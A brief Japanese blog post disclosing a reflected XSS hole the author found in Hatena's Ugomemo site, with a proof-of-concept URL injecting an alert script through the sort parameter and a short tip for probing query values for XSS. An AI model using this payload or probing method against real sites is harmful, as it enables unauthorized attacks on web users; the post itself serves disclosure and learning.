素人がプログラミングを勉強していたブログ

プログラミング、セキュリティ、英語、Webなどのブログ since 2008

連絡先: twitter: @javascripter すかいぷ:javascripter_ , javascripter あっと tsukkun.net twitterにどうぞ。

うごメモはてなのXSS

うごメモはてな - みんなの作品
はてなのXSS脆弱性を発見したのでメモ。

http://ugomemo.hatena.ne.jp/movies?sort="><script>alert("XSS")</script>

XSSは、クエリの値に

xxx>\"'%0A

と入れて、Firefoxのソース表示でxxxで検索して壊れてる部分を探すとすぐ見つかる。
参考文献:
適当なブログ